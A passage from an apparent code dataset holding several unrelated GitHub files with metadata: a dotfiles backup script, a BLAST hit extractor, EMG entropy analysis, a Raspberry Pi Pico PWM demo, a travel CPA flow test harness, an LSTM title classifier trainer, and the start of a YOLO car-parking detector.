os.path.dirname(os.path.realpath(__file__))\nSYS_NAME = platform.system().lower()\nCOLORS = {\n \"x\": \"\\x1b[0m\",\n \"w\": \"\\x1b[37m%s\\x1b[0m\",\n \"_\": \"\\x1b[90m%s\\x1b[0m\",\n \"r\": \"\\x1b[31m%s\\x1b[0m\",\n \"y\": \"\\x1b[33m%s\\x1b[0m\",\n \"g\": \"\\x1b[32m%s\\x1b[0m\",\n \"b\": \"\\x1b[34m%s\\x1b[0m\",\n \"m\": \"\\x1b[35m%s\\x1b[0m\",\n \"c\": \"\\x1b[36m%s\\x1b[0m\",\n}\n\nwith open(os.path.join(THIS_DIR, \"dots.yml\")) as fs:\n try:\n CONF = list(yaml.safe_load_all(fs))[0]\n except yaml.YAMLError as err:\n print(COLORS[\"r\"] % \" ✘ Fucked up:\")\n print(err)\n sys.exit()\nPATHS = CONF['sources']\nARCHIVE = CONF['archive_dir']\nDOTS_DIR = os.path.join(THIS_DIR, \"dotfiles\")\n\n\ndef backup():\n \"\"\" Parse listed paths and copy it's content to this repo\n with storing previous version.\n \"\"\"\n\n if not os.path.exists(DOTS_DIR):\n os.makedirs(DOTS_DIR)\n\n # Copying files\n clone_targets()\n\n # Git commit\n commit_changes()\n\n # Archive\n archive()\n\n\ndef clone_targets():\n \"\"\" Clone files listed in dots.yml in ./dotfiles\n \"\"\"\n print(COLORS[\"b\"] % \"\\n → Copying files...\")\n for name, path in PATHS.items():\n print(\" '%s' to '%s'\" % (path, os.path.join(\"dotfiles\", name)))\n target_path = path.replace(\"~\", HOME_DIR)\n backup_path = os.path.join(DOTS_DIR, name)\n\n shutil.rmtree(backup_path, True)\n\n if os.path.isdir(target_path):\n clone_dir(target_path, backup_path)\n elif os.path.isfile(target_path):\n try:\n safe_clone_file(target_path, backup_path)\n except OSError:\n continue\n\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef clone_dir(src_path, dest_dir):\n \"\"\" Clone dir recursively.\n \"\"\"\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n for (dirpath, dirnames, filenames) in os.walk(src_path):\n rel_path = os.path.relpath(dirpath, src_path)\n # Create dirs\n for dirname in dirnames:\n dirname = os.path.join(dest_dir, 
rel_path, dirname)\n dirname = os.path.abspath(dirname)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n # Clone files\n for filename in filenames:\n src = os.path.join(dirpath, filename)\n dest = os.path.join(dest_dir, rel_path, filename)\n dest = os.path.abspath(dest)\n try:\n safe_clone_file(src, dest)\n except OSError:\n continue\n\n\ndef safe_clone_file(src_path, dest_path):\n \"\"\" If file is text, read it, replace all home\n path occurances and write to dest path.\n If not text - just copy.\n \"\"\"\n with open(src_path) as file:\n try:\n normalized = file.read().replace(HOME_DIR, HOME_PIP)\n out = open(dest_path, \"w\")\n out.write(normalized)\n out.close()\n except ValueError:\n shutil.copy2(src_path, dest_path)\n except Exception as err:\n print(COLORS[\"r\"] % \" ✘ Fucked up with \", end=\"\")\n print(src_path)\n raise err\n\n\ndef commit_changes():\n \"\"\" Git commit.\n \"\"\"\n print(COLORS[\"b\"] % \"\\n → Git commit...\")\n git_status = run([\"git\", \"status\", \"--porcelain\"],\n stdout=PIPE).stdout.decode(\"utf-8\")\n for dif in git_status.split(\"\\n\"):\n dif_match = re.match(r\"^.(.+)\\s(.*)\", dif)\n if dif_match is None:\n continue\n if dif_match.group(1) == \"M\":\n print(COLORS[\"b\"] % (\" ~ \" + dif_match.group(2)))\n elif dif_match.group(1) == \"D\":\n print(COLORS[\"r\"] % (\" x \" + dif_match.group(2)))\n else:\n print(COLORS[\"_\"] % (\" ? \" + dif_match.group(2)))\n run([\"git\", \"add\", \".\"], stdout=PIPE)\n run([\"git\", \"commit\", \"-m\", \"'Backup'\"], stdout=PIPE)\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef archive():\n \"\"\" Archive dotfiles\n \"\"\"\n if not ARCHIVE:\n return\n\n print(COLORS[\"b\"] % \"\\n → Create archive...\")\n time = datetime.datetime.now().strftime(\"%Y.%m.%d-%H.%M\")\n target_dir = ARCHIVE.replace(\"~\", HOME_DIR)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n filename = \"dotfiles-\" + time\n dest_path = os.path.join(target_dir, filename)\n dest_path = os.path.abspath(dest_path)\n print(COLORS[\"_\"] % \" \" + dest_path + \".zip\")\n shutil.make_archive(dest_path, \"zip\", DOTS_DIR)\n print(COLORS[\"g\"] % \" ✓ Done\")\n\n\ndef restore():\n \"\"\" Copy content of this repo to destinition paths.\n \"\"\"\n pass\n\n\ndef help_msg():\n \"\"\" Prints help message.\n \"\"\"\n print(\"\"\"\n Commands:\n dots.py backup - Parse listed paths and copy it's content to this repo\n with storing previous version.\n dots.py restore username - Copy content of this repo to destination paths.\n\"\"\")\n\n\nif \"backup\" in sys.argv:\n backup()\nelif \"restore\" in sys.argv:\n restore()\nelse:\n help_msg()\n","repo_name":"mbnuqw/dotfiles","sub_path":"dots.py","file_name":"dots.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41405401890","text":"# #!/bin/python\n\nimport sys, os\nfrom Bio import SeqIO\nblast_file = sys.argv[1]\nfasta_file = sys.argv[2]\noutput_file = sys.argv[3]\n\n\n\nid_blast=[]\nwith open(blast_file) as f:\n for line in f:\n id_blast.append(line.split()[0])\n id_blast=set(id_blast)\n id_blast=list(id_blast)\n\nfasta_sequences = SeqIO.parse(open(fasta_file),'fasta')\nwith open(output_file, \"w\") as f:\n for seq in fasta_sequences:\n if seq.id in id_blast:\n SeqIO.write([seq], f, 
\"fasta\")\n","repo_name":"Aexbrayat/snakevir","sub_path":"snakevirome/scripts/extract_blast_hits.py","file_name":"extract_blast_hits.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29627936380","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport ApEn\nimport SampEn\nimport mean\nimport TKE\nimport envelope\n\nN = 64 # 滑动窗大小\nr = 0.2\n#\narr = np.loadtxt(\"E:\\\\嵌入式肌电手\\\\肌电数据\\\\谢志亮emg数据\\\\emg_data.txt\")\narr_CB = arr[:, 2]\n\n# arr_CB = arr_CB - np.mean(arr_CB) # 去中心化\n\n\ndef emgApEn(arr, m, r):\n std_all = np.std(arr)\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n # std_single = np.std(arr_fram,axis=0)\n arr_ApEn = [ApEn.ApEn(x, m, r*std_all) for x in arr_fram]\n return arr_ApEn\n\n\ndef emgSampEn(arr, m, r):\n std_all = np.std(arr)\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n arr_SampEn = [SampEn.SampEn(x, m, r*std_all) for x in arr_fram]\n return arr_SampEn\n\n\ndef emgSlidMean(arr):\n arr_fram = [[arr[i*N+j] for j in range(N)] for i in range(int(len(arr)/N))]\n arr_slideMean = [mean.slidMean(x) for x in arr_fram] \n return arr_slideMean\n\n\ndef emgTke(U):\n arr_TKE = TKE.tke(U)\n return arr_TKE\n\n\ndef emgEnvelop(U):\n arr_envelop = envelope.envelop(U)\n return arr_envelop\n\n\nplt.figure('原始数据')\nplt.title('source')\nplt.plot(arr_CB)\nplt.savefig(\"source.jpg\")\n\nplt.figure(\"傅里叶\")\nplt.plot(np.fft.fft(arr_CB))\n\nplt.figure(\"ApEn\")\nplt.title('ApEn r=0.2')\nplt.plot(emgApEn(arr_CB, 2, r))\nplt.savefig(\"ApEn.jpg\")\n\nplt.figure(\"SampEn\")\nplt.title(\"SampEn r=0.2\")\nplt.plot(emgSampEn(arr_CB, 2, r))\nplt.savefig(\"SampEn.jpg\")\n\nplt.figure(\"slideMean\")\nplt.title(\"slideMean\")\nplt.plot(emgSlidMean(arr_CB))\nplt.savefig(\"slideMean.jpg\")\n\n\nplt.figure(\"TKE\")\nplt.title(\"TKE\")\nplt.plot(emgTke(arr_CB))\nplt.savefig(\"TKE.jpg\")\n\nplt.figure(\"envelop\")\nplt.title(\"envelop\")\nplt.plot(emgEnvelop(arr_CB))\nplt.savefig(\"envelop.jpg\")\n\nplt.show()","repo_name":"duantao74520/xhand","sub_path":"嵌入式肌电手/算法代码/近似熵/Emg近似熵.py","file_name":"Emg近似熵.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73442491434","text":"# https://www.settorezero.com\n# Raspberry Pi Pico - esempio PWM\n# Regola Duty PWM con un trimmer sul pin 34 (GP28 = ADC2)\n# Utilizzato Slice 0, uscita PWM su pin 21 (GP16)\n# L'altra uscita dello slice 0 (GP17) non è usata e usata come normale GPIO, a livello basso\n# Utilizzato un display Oled 128x32 su I2C (GP9=SCL, GP8=SDA)\n\nfrom machine import Pin, PWM, I2C, ADC\nfrom ssd1306 import SSD1306_I2C\nimport framebuf\nfrom utime import sleep\n\n# set-up display oled\nWIDTH=128\nHEIGHT=32\ni2c=I2C(0) # Inizializza I2C con settaggi default modulo I2C0, SCL=Pin(GP9), SDA=Pin(GP8)\noled=SSD1306_I2C(WIDTH, HEIGHT, i2c)\noled.fill(0)\noled.text(\"Test PWM\",0,0)\noled.text(\"Duty: \",0,8)\noled.show()\n\npwm=PWM(Pin(16)) # GP16\npwm.freq(150000) # 150kHz\npwm.duty_u16(0) # duty cycle iniziale a 0\ngpio = Pin(17, Pin.OUT) #GP17 usato come normale I/O\ngpio.value(0) # GP17 a livello basso\n\ntrimmer=ADC(Pin(28)) #GP28, pin 34\nmedie=500 # numero di valori letti dal trimmer su cui fare la media\ntrimread=0\ni=0\n\nwhile True:\n trimread+=trimmer.read_u16()\n i+=1\n if (i==medie):\n trimread/=medie\n trimread=int(trimread)\n \n # riporto il valore medio del trimmer 
a percentuale\n percent=int((trimread/65000)*100)\n if (percent>100):\n percent=100\n \n # scrivo sul display\n oled.fill_rect(56, 8, 50, 8, 0) # cancello la parte precedente col valore di Duty\n oled.text(str(int(percent))+\"%\",56,8)\n oled.show()\n \n # riporto la percentuale come valore a 16bit da assegnare al duty cycle\n duty=(65535*percent)/100\n pwm.duty_u16(int(duty))\n \n # azzero le variabili usate per fare la media\n i=0\n trimread=0\n sleep(0.1)","repo_name":"Cyb3rn0id/Raspberry-Pi-Pico-Studies","sub_path":"pico/pwm/pwm1.py","file_name":"pwm1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"it","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"461401379","text":"# -*- coding: utf-8 -*-\n\nfrom copy import copy\nimport os\nimport tarfile\n\nfrom yatest.common import network\nimport yatest.common as common\n\nfrom travel.cpa.lib.lb_writer import LBWriter\n\nfrom data import LabelAvia, LabelHotels, LabelTrain, LabelSuburban, LabelBuses, LabelTours, Snapshot\n\n\nSTOP_WORD = 'PLEASE_STOP'\n\nBREAKER_LABEL_AVIA = LabelAvia.default().replace(marker=STOP_WORD)\n\nBREAKER_LABEL_HOTELS = LabelHotels.default().replace(Label=STOP_WORD)\n\nBREAKER_LABEL_TRAIN = LabelTrain.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_SUBURBAN = LabelSuburban.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_BUSES = LabelBuses.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_LABEL_TOURS = LabelTours.default().replace(LabelHash=STOP_WORD)\n\nBREAKER_SNAPSHOT = Snapshot.default().replace(hash=STOP_WORD)\n\n\nclass FlowApp(object):\n topic_label_avia = 'topic_label_avia'\n topic_label_hotels = 'topic_label_hotels'\n topic_label_train = 'topic_label_train'\n topic_label_suburban = 'topic_label_suburban'\n topic_label_buses = 'topic_label_buses'\n topic_label_tours = 'topic_label_tours'\n topic_snapshot = 'topic_snapshot'\n\n def __init__(self, yt_helper):\n self.yt_helper = yt_helper\n self.lb_grpc_port = int(os.getenv('LOGBROKER_PORT'))\n\n def run_app(self, processed_snapshots, saved_snapshots, purgatory_items, labels_to_send, snapshots_to_send):\n self.yt_helper.create_tables()\n self.yt_helper.write_snapshots(processed_snapshots, 'processed_snapshots')\n self.yt_helper.write_snapshots(saved_snapshots, 'snapshots')\n self.yt_helper.write_purgatory_items(purgatory_items, 'order_purgatory')\n\n self._send_to_lb(labels_to_send, snapshots_to_send)\n\n bin_root = common.binary_path('travel/cpa/data_processing/flow')\n self._extract_libraries(bin_root)\n\n with network.PortManager() as pm:\n http_port = pm.get_port()\n self._prepare_properties(bin_root, http_port)\n os.chdir(bin_root)\n common.execute(self._get_java_args(bin_root), wait=True)\n\n def _send_to_lb(self, labels_to_send, snapshots_to_send):\n snapshots_to_send = copy(snapshots_to_send)\n snapshots_to_send.append(BREAKER_SNAPSHOT)\n\n writer = LBWriter('localhost', self.lb_grpc_port, 'test_id', None)\n\n labels_avia = labels_to_send['avia']\n labels_avia.append([BREAKER_LABEL_AVIA])\n writer.write(self.topic_label_avia, self._convert_messages(labels_avia))\n\n labels_hotels = labels_to_send['hotels']\n labels_hotels.append([BREAKER_LABEL_HOTELS])\n writer.write(self.topic_label_hotels, self._convert_messages(labels_hotels))\n\n labels_train = labels_to_send['train']\n labels_train.append([BREAKER_LABEL_TRAIN])\n writer.write(self.topic_label_train, self._convert_messages(labels_train))\n\n labels_suburban = labels_to_send['suburban']\n 
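# the one-element [BREAKER_LABEL_*] message carries STOP_WORD ('PLEASE_STOP'); presumably the\n        # flow application under test watches for it to know when each topic's stream has ended\n        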
labels_suburban.append([BREAKER_LABEL_SUBURBAN])\n writer.write(self.topic_label_suburban, self._convert_messages(labels_suburban))\n\n labels_buses = labels_to_send['buses']\n labels_buses.append([BREAKER_LABEL_BUSES])\n writer.write(self.topic_label_buses, self._convert_messages(labels_buses))\n\n labels_tours = labels_to_send['tours']\n labels_tours.append([BREAKER_LABEL_TOURS])\n writer.write(self.topic_label_tours, self._convert_messages(labels_tours))\n\n writer.write(self.topic_snapshot, [item.as_dict() for item in snapshots_to_send])\n\n @staticmethod\n def _convert_messages(messages):\n converted_messages = list()\n for message in messages:\n converted_messages.append([item.as_dict() for item in message])\n return converted_messages\n\n @staticmethod\n def _extract_libraries(bin_root):\n # JAVA_PROGRAM classpath is delivered as directory with files when `YMAKE_JAVA_MODULES==yes` rather then\n # tar archive.\n if os.path.isdir(os.path.join(bin_root, 'travel-cpa-flow')):\n return\n tar_path = os.path.join(bin_root, 'travel-cpa-flow.tar')\n tar_target = os.path.join(bin_root, 'travel-cpa-flow')\n with tarfile.open(tar_path) as f:\n f.extractall(tar_target)\n\n def _prepare_properties(self, bin_root, http_port):\n properties_template_path = common.source_path('travel/cpa/tests/flow/application_properties_template.yml')\n with open(properties_template_path) as f:\n properties_template = f.read()\n properties = properties_template.format(\n http_port=http_port,\n lb_port=self.lb_grpc_port,\n yt_proxy=self.yt_helper.yt_proxy,\n yt_root=self.yt_helper.yt_root,\n )\n\n cfg_path = os.path.join(bin_root, 'application-tests.yml')\n with open(cfg_path, 'w') as f:\n f.write(properties)\n\n @staticmethod\n def _get_java_args(bin_root):\n args_template_path = common.source_path('travel/cpa/tests/flow/java_args_template.txt')\n with open(args_template_path) as f:\n args_template = f.read()\n args_text = args_template.format(\n java_bin=common.java_bin(),\n log_dir=common.output_path('app-logs'),\n lib_dir=os.path.join(bin_root, 'travel-cpa-flow'),\n )\n return args_text.split('\\n')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/flow/flow_app.py","file_name":"flow_app.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9488156552","text":"import re\nimport spacy\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\nimport os\n\nfrom torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport gensim\nimport random\nimport math\nimport itertools\nimport pykrylov as krylov\nfrom .config import parser\nfrom .utils import process_df, save_ckpt\nfrom torch.utils.tensorboard import SummaryWriter\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\n\ndef tokenize_title(text, tokenizer):\n text = text.lower()\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n # Clean text from special characters\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n text = \" \".join(text.split())\n return text\n\n\nclass LSTMClassifier(nn.Module):\n\n # define all the layers used in model\n def __init__(self, vocab_size, embedding_dim, hidden_dim, n_layers, bidirectional, dropout, number_of_classes,\n pad_token_id):\n # Constructor\n 
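# layout: an embedding (pad index kept as a zero vector) feeding a possibly bidirectional\n        # LSTM, with a linear classifier over the final hidden state; all sizes come from the arguments\n        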
super().__init__()\n # embedding layer\n # pre_trained_emb = torch.FloatTensor(text_field.vocab.vectors)\n # self.embedding = nn.Embedding.from_pretrained(pre_trained_emb)\n self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=pad_token_id)\n # lstm layer\n self.hidden_dim = hidden_dim\n self.num_layers = n_layers\n self.bidirectional = bidirectional\n self.lstm = nn.LSTM(input_size=embedding_dim,\n hidden_size=hidden_dim,\n num_layers=n_layers,\n bidirectional=self.bidirectional,\n dropout=dropout,\n batch_first=True)\n\n # dense layer\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, number_of_classes)\n else:\n self.fc = nn.Linear(hidden_dim, number_of_classes)\n # activation function\n # self.sigmoid = nn.Sigmoid()\n\n def forward(self, text, text_lengths):\n # text = [batch size,sent_length]\n embedded = self.embedding(text)\n # embedded = [batch size, sent_len, emb dim]\n\n # packed sequence\n packed_input = pack_padded_sequence(embedded, text_lengths.cpu(), batch_first=True)\n with torch.backends.cudnn.flags(enabled=False):\n packed_output, (hidden, cell) = self.lstm(packed_input)\n # hidden = [batch size, num layers * num directions,hid dim]\n # cell = [batch size, num layers * num directions,hid dim]\n\n if self.bidirectional:\n # concat the final forward and backward hidden state\n hidden = torch.cat((hidden[self.num_layers - 1, :, :], hidden[-1, :, :]), dim=1)\n else:\n hidden = hidden[-1, :, :]\n # hidden = [batch size, hid dim * num directions]\n dense_outputs = self.fc(hidden)\n return dense_outputs\n\n\n\nclass PadSequence:\n def __init__(self, pad_token_id=0):\n self.pad_token_id = pad_token_id\n\n def __call__(self, batch):\n sorted_batch = sorted(batch, key=lambda x: len(x['text']), reverse=True)\n sequences = [torch.LongTensor(x['text']) for x in sorted_batch]\n sequences_padded = torch.nn.utils.rnn.pad_sequence(sequences, batch_first=True, padding_value=self.pad_token_id)\n lengths = torch.LongTensor([len(x) for x in sequences])\n labels = torch.LongTensor([x['label'] for x in sorted_batch])\n return sequences_padded, lengths, labels\n\nclass LSTMTitlesDataset(Dataset):\n\n def __init__(self, df, input_col, label_col, vocab_index, unk_token_id):\n self.df = df\n self.input_col = input_col\n self.label_col = label_col\n self.spacy_tokenizer = spacy.blank(\"en\")\n self.vocab_index = vocab_index\n self.unk_token_id = unk_token_id\n\n def tokenize_title(self, text):\n text = text.lower()\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in self.spacy_tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n tokens = text.split()\n if len(tokens) == 0:\n return [self.unk_token_id]\n return [self.vocab_index[token] if token in self.vocab_index else self.unk_token_id for token in tokens]\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, index):\n row = self.df.iloc[index]\n title = row[self.input_col]\n label = row[self.label_col]\n\n return {'text': self.tokenize_title(title), 'label': label}\n\n\n\n\n\nclass LSTMPrefixTitlesDataset(Dataset):\n\n def __init__(self, df, input_col, label_col, vocab_index, unk_token_id,random_=True):\n self.df = df\n self.input_col = input_col\n self.label_col = label_col\n self.spacy_tokenizer = spacy.blank(\"en\")\n self.vocab_index = vocab_index\n self.unk_token_id = unk_token_id\n self.random=random_\n\n def tokenize_title(self, 
text):\n text = text.lower()\n\n # Remove non Ascii letters\n text = \"\".join(c for c in text if ord(c) < 128)\n # Separate words\n text = \" \".join(a.text for a in self.spacy_tokenizer(text))\n # Replace dot without space\n text = text.replace(\".\", \"\")\n text = re.sub('[^A-Za-z0-9 ]+', ' ', text.strip())\n tokens = text.split()\n if len(tokens) == 0:\n return [self.unk_token_id]\n return [self.vocab_index[token] if token in self.vocab_index else self.unk_token_id for token in tokens]\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, index):\n row = self.df.iloc[index]\n title = row[self.input_col]\n if self.random:\n tokens = self.spacy_tokenizer(title) # Does not preprocess for alignment with BERT\n length = len(tokens)\n max_index = math.floor(length / 2)\n rand_index = random.randint(1, max_index)\n prefix = tokens[:rand_index].text\n else:\n prefix=title\n\n label = row[self.label_col]\n\n return {'text': self.tokenize_title(prefix), 'label': label}\n\n\ndef train_model(model,\n checkpoint_name,\n train_loader,\n valid_loader,\n optimizer,\n num_epochs=10,\n device=torch.device('cuda'),\n log_dir=\"./\"\n ):\n LSTM_MODEL_DIR = \"/data/ebay/data/ggoren/etr_models/\"\n MIN_DELTA = 0.05\n PATIENCE = 2\n\n criterion = nn.CrossEntropyLoss()\n global_step = 0\n termination = False\n\n writer = SummaryWriter(\n log_dir=os.path.join(log_dir, checkpoint_name))\n total_steps = num_epochs * len(train_loader)\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps=1e4,\n num_training_steps=total_steps)\n # training loop\n for epoch_i in range(num_epochs):\n model.train()\n\n if termination:\n print(\"No improvement in validation loss, terminating\")\n break\n\n total_train_loss = 0\n total_bs_train = 0\n for batch in train_loader:\n titles, titles_len, labels = batch\n labels = labels.to(device)\n titles = titles.to(device)\n titles_len = titles_len.to(device)\n outputs = model(titles, titles_len)\n loss = criterion(outputs, labels)\n writer.add_scalar(\"Loss/train\", loss.item(), global_step)\n total_train_loss += (loss.item() * len(labels))\n total_bs_train += len(labels)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n # update running values\n global_step += 1\n\n avg_train_loss = total_train_loss / total_bs_train\n print(\"\")\n print(\" Average training loss: {}\".format(avg_train_loss), flush=True)\n\n print(\"\")\n print(\"Running Validation...\")\n\n total_eval_loss = 0\n total_bs = 0\n all_labels = []\n all_preds = []\n # Evaluate data for one epoch\n model.eval()\n\n for batch in valid_loader:\n with torch.no_grad():\n titles, titles_len, labels = batch\n titles = titles.to(device)\n titles_len = titles_len.to(device)\n labels = labels.to(device)\n outputs = model(titles, titles_len)\n loss = criterion(outputs, labels)\n total_eval_loss += (loss.item() * len(labels))\n total_bs += len(labels)\n\n predicted_labels = outputs.argmax(dim=-1)\n all_preds.extend(list(predicted_labels.cpu().numpy()))\n all_labels.extend(list(labels.cpu().numpy()))\n avg_val_loss = total_eval_loss / total_bs\n writer.add_scalar(\"Loss/dev\", avg_val_loss, epoch_i)\n acc = np.mean([1 if i == j else 0 for i, j in zip(all_preds, all_labels)])\n writer.add_scalar(\"Accuracy/dev\", acc, epoch_i)\n print(\" Validation Loss: {}\".format(avg_val_loss), flush=True)\n print(\" Validation classification accuracy: {}\".format(acc), flush=True)\n\n if epoch_i == 0:\n BEST = avg_val_loss\n LOWEST_LOSS = avg_val_loss\n BEST_ACC = acc\n 
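# epoch 0 only seeds the early-stopping baselines (BEST / LOWEST_LOSS / BEST_ACC)\n            # and stores an initial checkpoint before any comparison is made\n            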
save_ckpt(LSTM_MODEL_DIR, model, checkpoint_name + 'best_acc')\n continue\n else:\n if BEST_ACC < acc:\n save_ckpt(LSTM_MODEL_DIR, model, checkpoint_name + 'best_acc')\n BEST_ACC = acc\n if avg_val_loss < LOWEST_LOSS:\n LOWEST_LOSS = avg_val_loss\n\n if BEST - MIN_DELTA <= avg_val_loss:\n PATIENCE -= 1\n if PATIENCE == 0:\n termination = True\n else:\n PATIENCE = 2\n BEST = avg_val_loss\n writer.close()\n print('Finished Training!')\n print(\"BEST ACC\", BEST_ACC)\n\n\n\ndef instantiate_train_amazon(configuration, seed,hparams):\n hidden_size, learning_rate, batch_size, dropout, num_layers, wd, window_size = configuration\n\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n nlp = spacy.blank(\"en\")\n device = torch.device('cuda')\n\n w2v_model = gensim.models.KeyedVectors.load(hparams.w2v_model_path)\n word2vec_vectors = list(w2v_model.vectors)\n vocab_size = len(w2v_model.index_to_key) + 2\n\n embedding_dim = w2v_model.vector_size\n\n word2vec_vectors.append(np.random.normal(scale=1.0, size=(embedding_dim,)))\n word2vec_vectors.append(np.zeros(shape=(embedding_dim,)))\n\n bidirection = True\n\n train = pd.read_csv(hparams.train_dataset_path,\n keep_default_na=False,\n na_values=['$$$__$$$'])\n\n dev = pd.read_csv(hparams.dev_dataset_path,\n keep_default_na=False,\n na_values=['$$$__$$$'])\n\n train['title'] = train['title'].apply(lambda x: \" \".join(x.split()))\n dev['title'] = dev['title'].apply(lambda x: \" \".join(x.split()))\n\n train = process_df(train, nlp)\n dev = process_df(dev, nlp)\n\n number_of_classes = train['label'].nunique()\n\n if hparams.mode=='random':\n train_dl = DataLoader(LSTMPrefixTitlesDataset(train, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, shuffle=True,\n collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n dev_dl = DataLoader(\n LSTMPrefixTitlesDataset(dev, \"title\", \"label\", w2v_model.key_to_index, unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n lstm_model = LSTMClassifier(vocab_size, embedding_dim, hidden_size, num_layers, bidirection, dropout,\n number_of_classes, pad_token_id=len(word2vec_vectors) - 1)\n else:\n train_dl = DataLoader(LSTMTitlesDataset(train, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, shuffle=True,\n collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n dev_dl = DataLoader(\n LSTMTitlesDataset(dev, \"title\", \"label\", w2v_model.key_to_index,\n unk_token_id=len(word2vec_vectors) - 2),\n batch_size=batch_size, num_workers=4, collate_fn=PadSequence(pad_token_id=len(word2vec_vectors) - 1))\n lstm_model = LSTMClassifier(vocab_size, embedding_dim, hidden_size, num_layers, bidirection, dropout,\n number_of_classes, pad_token_id=len(word2vec_vectors) - 1)\n\n word2vec_vectors = torch.FloatTensor(word2vec_vectors)\n\n lstm_model.embedding.load_state_dict({\"weight\": word2vec_vectors})\n lstm_model = lstm_model.to(device)\n\n optimizer = AdamW(lstm_model.parameters(), lr=learning_rate, eps=1e-6, weight_decay=wd)\n\n checkpoint_name = \"lstm_prefix_etr_amazon_\" + \"_\".join(\n [str(seed), str(batch_size), str(wd), str(learning_rate), str(dropout), str(num_layers), str(window_size)])\n\n train_model(lstm_model, 
checkpoint_name, train_dl, dev_dl, optimizer, num_epochs=hparams.num_epochs,\n log_dir=hparams.tensorboard_log_dir, device=device)\n\n\n\n\n\n\n\ndef training_wrapper_amazon(seed,hparams):\n window_sizes = [4,6]\n hidden_size = [384, ]\n learning_rate = [0.01, 0.001, 0.0001, 1e-5, 3e-5, 5e-5]\n batch_size = [64]\n dropout = [0.1, ]\n num_layers = [1]\n weight_decay = [0.01, ]\n\n configurations = list(\n itertools.product(hidden_size, learning_rate, batch_size, dropout, num_layers, weight_decay, window_sizes))\n\n for config in configurations:\n instantiate_train_amazon(config, seed, hparams)\n\nif __name__ == \"__main__\":\n hparams = parser.parse_args()\n training_wrapper_amazon(9001,hparams)\n","repo_name":"titleprefixes/prefixes_code","sub_path":"lstm_prefix_titles.py","file_name":"lstm_prefix_titles.py","file_ext":"py","file_size_in_byte":14661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28540635688","text":"from yolov3.utils import Load_Yolo_model, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names\nfrom yolov3.configs import *\nfrom deep_sort import nn_matching\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker\nfrom deep_sort import generate_detections as gdet\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom shapely.geometry import Polygon , box\n\n#Check out demo_yolo.py for explanation on how to set the model up\n\n#Object Tracking links\n# https://www.pyimagesearch.com/2018/07/23/simple-object-tracking-with-opencv/\n# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/\n# http://davheld.github.io/GOTURN/GOTURN.html\n\nclass spotObject:\n def __init__(self, index, polygon): \n self.index = index \n self.polygon = polygon\n self.isOccupied = False\n\nclass carDetector:\n\n def __init__(self):\n self.prevFrame = None #Store previous frame, don't know if we'll need this\n self.boundingBoxes = [] #Store bounding boxes of previous frame, will likely need this for object tracking\n self.currFrame = None\n self.openParkingSpots = []\n self.assignedParkingSpots=[]\n self.occupiedParkingSpots=[]\n self.matched = []\n self.matchedCars = []\n\n #Threshold of what is a car\n self.thresh = 0.7\n self.input_size = YOLO_INPUT_SIZE\n self.iou_threshold=0.45\n\n self.NUM_CLASS = read_class_names(YOLO_COCO_CLASSES)\n self.key_list = list(self.NUM_CLASS.keys()) \n 